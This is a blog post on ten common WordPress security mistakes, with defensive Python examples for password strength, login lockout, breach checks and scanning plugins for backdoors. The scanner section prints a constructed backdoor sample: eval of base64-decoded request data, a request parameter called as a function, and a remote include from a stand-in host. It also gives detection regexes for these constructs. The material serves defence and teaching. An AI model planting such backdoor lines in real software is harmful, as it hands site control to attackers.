
10 WordPress Security Mistakes to Avoid


In a recent blog post, following the release of the WordPress 5.5 update, I shared some ways to fix a WordPress website which is broken due to the update.

There’s nothing more frustrating than finding out that your website is broken because of a WordPress security problem, is there? It also does your reputation no favours when it is your clients who tell you that your website is broken.

They say that prevention is the best medicine, so to help you be better prepared, here are 10 common WordPress security mistakes that can be easily avoided.

Before I get started, I’m going to suggest that you check out the Wordfence WordPress security plugin which I install on all client sites. I’ve highlighted various Wordfence features throughout this post to help protect your website against the dangers highlighted. Wordfence follows the common WordPress freemium model and there are both free and premium (annual fee) versions of the plugin.

Now on to the mistakes….

1) Poor Quality, Insecure Website Hosting

Before we get into the WordPress security specifics, it is important to start with your hosting. A University of Maryland study found that internet-connected computers are attacked on average every 39 seconds, which makes the security of your hosting environment of paramount importance.

Website hosting comes in all sorts of offerings and price points. In my experience you generally get what you pay for, and at the cheap end website and WordPress security can easily take a back seat.

When we recently put together the hosting for our soon-to-be-launched managed WordPress site service, we ensured that our offering included the following:-

2) Not Using Two-Factor Authentication

Two-factor authentication (often shortened to 2FA) means, put simply, that two independent checks are needed to prove your identity when you log in to your website: something you know (your password) and something you have (your phone or a hardware key).

One common way to do this, which you have no doubt come across, is a code sent via SMS to your nominated mobile/cell phone number. As an added security measure you only have a short timeframe to enter the code and gain access. SMS is the weakest form of 2FA, though: codes can be intercepted or redirected by SIM-swapping your number, so prefer an authenticator app or a hardware key where the option exists.

By default, WordPress does not include 2FA, but the Wordfence WordPress security plugin mentioned earlier (the option is available in both the free and premium versions) includes this capability and is highly recommended. Wordfence will work with any authenticator app that supports Time-based One-Time Passwords (TOTP, as specified in RFC 6238), including:-

3) The Use of an “admin” Login Username

The odds of your website’s WordPress security being compromised increase significantly when you use an ‘admin’ username. Many automated scripts and hacking attempts try this username first, so you are handing them half of the credential pair.

Instead use something that is not obvious. Bear in mind that this is only a small hurdle: WordPress reveals usernames through author archive URLs (for example ?author=1) and the REST API users endpoint unless you block them, so treat a non-obvious username as a bonus on top of strong passwords, 2FA and login rate limiting, not as a defence on its own.

4) Using Easily Compromised Passwords

Ensure that your passwords are also not something that can be easily guessed. If you need help coming up with a secure password, there are password generators available.

[Screenshot: Firefox password generator]

For example, you can have the Firefox browser generate a random password for you as shown above: just right-click on the password field and pick the suggested password. You can use the same process to create a random username.

Make sure you store the password safely in a password manager, though, because unless you are Albert Einstein you will struggle to remember it!

The Wordfence WordPress security plugin also includes a setting that will require all website users to use a strong password.

[Screenshot: How secure is my password]

There are websites that will estimate how long it would take to crack a given password. Never paste a real password into a third-party site, though: you have no idea where it is logged. If you want a feel for the number, test a throwaway password of the same length and character mix, or estimate it offline.

I think I can sleep peacefully with this result.
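The two things above, generating a password and judging how long it would survive, can both be done locally so nothing leaves your machine. The following is an added example written for this post, not code from the post or from Wordfence or Firefox. The symbol set and the two guessing rates (a GPU rig against a fast unsalted hash, and the same rig against a slow password hash) are my own order-of-magnitude assumptions, chosen to show why the hashing the site uses matters as much as the password itself.

```python
import math
import secrets
import string

# Character classes the generator draws from. The symbol set is deliberately conservative
# so the result is accepted by most login forms (assumption for this example).
CLASSES = {
    "lower": string.ascii_lowercase,
    "upper": string.ascii_uppercase,
    "digit": string.digits,
    "symbol": "!#$%&*+-=?@^_~",
}

SECONDS_PER_YEAR = 31_557_600


def generate_password(length: int = 20) -> str:
    """Random password from the `secrets` CSPRNG (never `random`), with every class present."""
    if length < len(CLASSES):
        raise ValueError("length too short to include every character class")
    alphabet = "".join(CLASSES.values())
    while True:
        pw = "".join(secrets.choice(alphabet) for _ in range(length))
        if all(any(ch in cls for ch in pw) for cls in CLASSES.values()):
            return pw


def entropy_bits(password: str) -> float:
    """Upper-bound entropy: log2(alphabet size) per character, the alphabet being the union
    of the classes that appear. Accurate for randomly generated passwords; a large
    overestimate for dictionary words and keyboard patterns, which crackers try first."""
    if not password:
        return 0.0
    alphabet = sum(len(cls) for cls in CLASSES.values() if any(ch in cls for ch in password))
    # Characters outside the classes (spaces, accented letters) each add one symbol.
    alphabet += len({ch for ch in password if not any(ch in cls for cls in CLASSES.values())})
    return len(password) * math.log2(alphabet)


def seconds_to_crack(bits: float, guesses_per_second: float) -> float:
    """Expected time for an offline attacker testing `guesses_per_second` candidates who,
    on average, finds the password halfway through the keyspace."""
    return 2 ** (bits - 1) / guesses_per_second


def describe(password: str) -> dict:
    """Crack-time estimates under two assumed attacker rates (order of magnitude only)."""
    bits = entropy_bits(password)
    return {
        "bits": round(bits, 1),
        # ~1e10 guesses/s: GPU rig against a fast unsalted hash such as MD5 (assumed).
        "years_vs_fast_hash": seconds_to_crack(bits, 1e10) / SECONDS_PER_YEAR,
        # ~1e5 guesses/s: the same rig against a slow hash such as bcrypt (assumed).
        "years_vs_slow_hash": seconds_to_crack(bits, 1e5) / SECONDS_PER_YEAR,
    }


if __name__ == "__main__":
    pw = generate_password()
    print(pw, describe(pw))
    print("eight lowercase letters:", describe("qzxvbnmk"))
```

Eight lowercase letters come out at roughly 38 bits, which the fast-hash attacker exhausts in under a minute; the 20-character generated password is over 120 bits and is out of reach under either rate. The "years" figures are only as good as the rate you assume, which is the caveat the online checkers gloss over.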

5) No protection against Brute Force Attack

A Brute Force Attack occurs when an attacker makes a large number of repeated login attempts, guessing usernames and passwords until one works.

Limiting the number of failed login attempts allowed and temporarily blocking the source (and the targeted account) once that number is exceeded takes most of the speed out of such attacks.

[Screenshot: Wordfence WordPress security plugin brute force attack settings]

The Wordfence WordPress security plugin (both free and premium versions) includes this kind of login rate limiting and lockout.

You can see some of the settings above.
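Here is what a login limiter of the kind described above does internally, as an added example written for this post rather than Wordfence’s implementation. It keeps a sliding window of failures per source IP and per username, locks either key once the threshold is crossed, and refuses locked requests before the password is even checked. The thresholds and the `check_credentials` callback are placeholders for this example.

```python
from collections import defaultdict, deque


class LoginLimiter:
    """Sliding-window failure counter with lockout, keyed by source IP and by username."""

    def __init__(self, max_failures: int = 5, window: int = 600, lockout: int = 900):
        self.max_failures = max_failures   # failures allowed inside one window
        self.window = window               # seconds the window covers
        self.lockout = lockout             # seconds a key stays locked
        self._failures = defaultdict(deque)  # key -> timestamps of recent failures
        self._locked_until = {}              # key -> unix time the lock expires

    @staticmethod
    def _keys(ip: str, username: str):
        # Locking the username too stops an attacker who rotates through many IPs;
        # the price is that someone can lock a real user out on purpose, so keep the
        # username lockout short and pair it with 2FA rather than making it longer.
        return (f"ip:{ip}", f"user:{username.lower()}")

    def _prune(self, key: str, now: int) -> None:
        q = self._failures[key]
        while q and q[0] <= now - self.window:
            q.popleft()

    def is_locked(self, ip: str, username: str, now: int) -> bool:
        for key in self._keys(ip, username):
            until = self._locked_until.get(key)
            if until is None:
                continue
            if now < until:
                return True
            del self._locked_until[key]   # lock expired
        return False

    def record_failure(self, ip: str, username: str, now: int) -> bool:
        """Record one failed attempt; returns True if it triggered a lockout."""
        locked = False
        for key in self._keys(ip, username):
            self._prune(key, now)
            self._failures[key].append(now)
            if len(self._failures[key]) >= self.max_failures:
                self._locked_until[key] = now + self.lockout
                self._failures[key].clear()
                locked = True
        return locked

    def record_success(self, ip: str, username: str) -> None:
        for key in self._keys(ip, username):
            self._failures[key].clear()


def attempt_login(limiter: LoginLimiter, ip: str, username: str, password: str,
                  now: int, check_credentials) -> str:
    """Order matters: refuse locked keys before touching the credential check, so a locked
    attacker learns nothing and costs the server nothing. Returns 'locked', 'ok' or 'failed'."""
    if limiter.is_locked(ip, username, now):
        return "locked"
    if check_credentials(username, password):   # placeholder for the real password check
        limiter.record_success(ip, username)
        return "ok"
    limiter.record_failure(ip, username, now)
    return "failed"


if __name__ == "__main__":
    lim = LoginLimiter(max_failures=3, window=60, lockout=120)
    always_wrong = lambda user, pw: False
    for t in range(5):   # constructed: five guesses from one address at one-second intervals
        print(t, attempt_login(lim, "203.0.113.5", "bob", f"guess{t}", t, always_wrong))
```

Two details worth copying: the failure list is cleared on success so one typo does not accumulate against a legitimate user for the whole window, and the lock is checked before the password so the expensive hash comparison is never run for a locked key.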

6) Poor User Role Management

When assigning roles to site users, follow the “principle of least privilege”: give each person the minimum access they need to do their job, and nothing more.

Generally speaking, most users need no more than Subscriber or Contributor. Reserve Editor for people who actually publish and Administrator for the one or two people who manage the site, and make sure you do not allow open registration on your website.

[Screenshot: WordPress "Anyone can register" setting]

To do this, ensure that the “Anyone can register” checkbox is not checked under Membership on the Settings -> General page in the WordPress dashboard.

7) Reusing Same Passwords Over and Over

Another common cause of WordPress security issues is reusing a password that has already appeared in a data breach elsewhere. Attackers can easily obtain lists of these leaked passwords and try them against your site (so-called credential stuffing), making it an easy target.

[Screenshot: Wordfence WordPress security plugin password setting]

The Wordfence WordPress security plugin will also prevent the use of passwords that have been leaked in data breaches to provide further peace of mind.
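Checks of this kind are usually built on the Have I Been Pwned “Pwned Passwords” range API, which uses k-anonymity: the client sends only the first five hex characters of the password’s SHA-1 and receives every hash suffix in that bucket, so the full hash never leaves your machine. The code below is an added example written for this post, not Wordfence’s code, and the sample response is constructed (real buckets contain hundreds of lines and the counts here are made up); only the hash of the word “password” is real.

```python
import hashlib
import urllib.request

RANGE_API = "https://api.pwnedpasswords.com/range/"


def sha1_prefix_suffix(password: str):
    """Split the upper-case hex SHA-1 into the 5-char prefix sent to the API and the 35-char remainder."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]


def count_in_range(suffix: str, range_body: str) -> int:
    """Parse a range response (one 'SUFFIX:COUNT' per line) and return the breach count for
    `suffix`, or 0 if it is absent. Padding entries from the server carry a count of 0."""
    for line in range_body.splitlines():
        line = line.strip()
        if not line or ":" not in line:
            continue
        hash_suffix, _, count = line.partition(":")
        if hash_suffix.strip().upper() == suffix:
            return int(count.strip() or 0)
    return 0


def fetch_range(prefix: str, timeout: float = 5.0) -> str:
    """Live lookup (not exercised by the offline demo). The Add-Padding header makes every
    response a similar size, so a network observer cannot tell which bucket was asked for
    by its length."""
    req = urllib.request.Request(
        RANGE_API + prefix,
        headers={"Add-Padding": "true", "User-Agent": "example-password-check"},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8")


def breach_count(password: str, range_body: str) -> int:
    """Number of breaches the password appeared in, given the response for its prefix."""
    _, suffix = sha1_prefix_suffix(password)
    return count_in_range(suffix, range_body)


def breach_count_live(password: str) -> int:
    prefix, suffix = sha1_prefix_suffix(password)
    return count_in_range(suffix, fetch_range(prefix))


# Constructed sample of a range response for prefix 5BAA6, the prefix of SHA-1("password").
# The middle line is the genuine suffix for "password"; the other suffixes and all counts
# are made up for this example.
SAMPLE_RANGE_5BAA6 = """\
1CC93AEDC22D2CBAB0C4C0D1C8E13B1E6D0:2
1E4C9B93F3F0682250B6CF8331B7EE68FD8:3861493
2A9B0A60E6A6C5A7F8C8E3A5B8F2D8A1B55:0
"""


if __name__ == "__main__":
    prefix, suffix = sha1_prefix_suffix("password")
    print("sending only prefix", prefix, "to", RANGE_API + prefix)
    print("breach count:", breach_count("password", SAMPLE_RANGE_5BAA6))
```

Any count above zero should reject the password at registration or password-change time. SHA-1 is fine here because it is only a lookup key for the breach corpus, not the hash your site stores; the stored hash must still use a slow password hashing function.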

8) Using Nulled Themes or Plugins

You’ve no doubt heard your share of tales of people whose computers were infected by pirated software that came with hidden malware. Well, the same applies to “nulled” copies of premium WordPress themes or plugins offered free of charge.

They should be avoided: nulled packages commonly ship with backdoors, spam or advertising injected into your pages, and other malware, and because they are cut off from the vendor they never receive its security updates either.
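If a site you inherit already has plugins of unknown origin installed, a quick triage is to grep them for the constructs that backdoors rely on and legitimate plugin code almost never uses. The scanner below is an added example written for this post (not Wordfence’s malware scanner, which is far more thorough) and the sample plugin file is constructed for the demonstration; it is not a real plugin. Treat hits as leads for manual review rather than verdicts, since image handling and some libraries legitimately use base64.

```python
import os
import re

# (label, regex) pairs for constructs typical of bundled backdoors. Every pattern is
# matched line by line against PHP source.
SIGNATURES = [
    ("eval of an obfuscated payload",
     re.compile(r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(", re.I)),
    ("request data passed straight to eval/assert",
     re.compile(r"\b(?:eval|assert)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I)),
    ("request parameter called as a function",
     re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\[[^\]]+\]\s*\(", re.I)),
    ("preg_replace with the /e (eval) modifier",        # assumes '/' as the regex delimiter
     re.compile(r"\bpreg_replace\s*\(\s*['\"]/.*?/[a-z]*e[a-z]*['\"]", re.I)),
    ("include/require of a remote URL",
     re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*['\"]https?://", re.I)),
    ("very long base64 literal (possible packed payload)",
     re.compile(r"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]")),
]


def scan_source(src: str):
    """Return (line_number, label, line_text) for every line that matches a signature."""
    findings = []
    for lineno, line in enumerate(src.splitlines(), start=1):
        for label, pattern in SIGNATURES:
            if pattern.search(line):
                findings.append((lineno, label, line.strip()))
    return findings


def scan_tree(root: str):
    """Walk a wp-content/plugins or wp-content/themes directory and scan every .php file.
    Returns {path: findings} for files with at least one hit."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_source(fh.read())
            if hits:
                results[path] = hits
    return results


# Constructed sample: the first three lines are ordinary plugin boilerplate, the last
# three are the kind of backdoor found in nulled packages. Not a real plugin.
SAMPLE_PLUGIN = """\
<?php
/* Plugin Name: Example Gallery (constructed sample) */
add_action('init', 'eg_register_gallery');
if (isset($_REQUEST['cmd'])) { eval(base64_decode($_REQUEST['cmd'])); }
$_GET['fn']($_GET['arg']);
include('http://example.com/loader.txt');
"""


if __name__ == "__main__":
    for lineno, label, text in scan_source(SAMPLE_PLUGIN):
        print(f"line {lineno}: {label}: {text}")
```

On a real install point `scan_tree` at wp-content/plugins and diff anything flagged against a fresh copy from the official directory or the vendor; a nulled package usually differs from the original in exactly one or two files, and those are the ones to read.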

9) Not Keeping WordPress Updated

Keeping your WordPress core, themes and plugins up to date ensures that known vulnerabilities in them are patched. I also suggest doing a plugin audit and removing any inactive plugins and themes from your website.

Vulnerabilities in inactive plugins and themes can still allow your website to be compromised and they are easily missed. They may not be in use but they are still installed in your WordPress environment and can be exploited by hackers.

10) No Firewall Monitoring Website Traffic

A web application firewall is an extremely important security requirement for your website: it inspects each incoming HTTP request and blocks those that match known attack patterns (SQL injection, cross-site scripting, malicious file uploads and the like) before they reach WordPress. Wordfence includes a firewall of this kind with many features, and you can find out more about it on the Wordfence site.

I know that the topic of security can quickly overwhelm many and there’s a lot to consider.

I hope you found the tips shared in this post helpful. Are you looking for further details on any of the suggestions made? Please let me know in the comments.
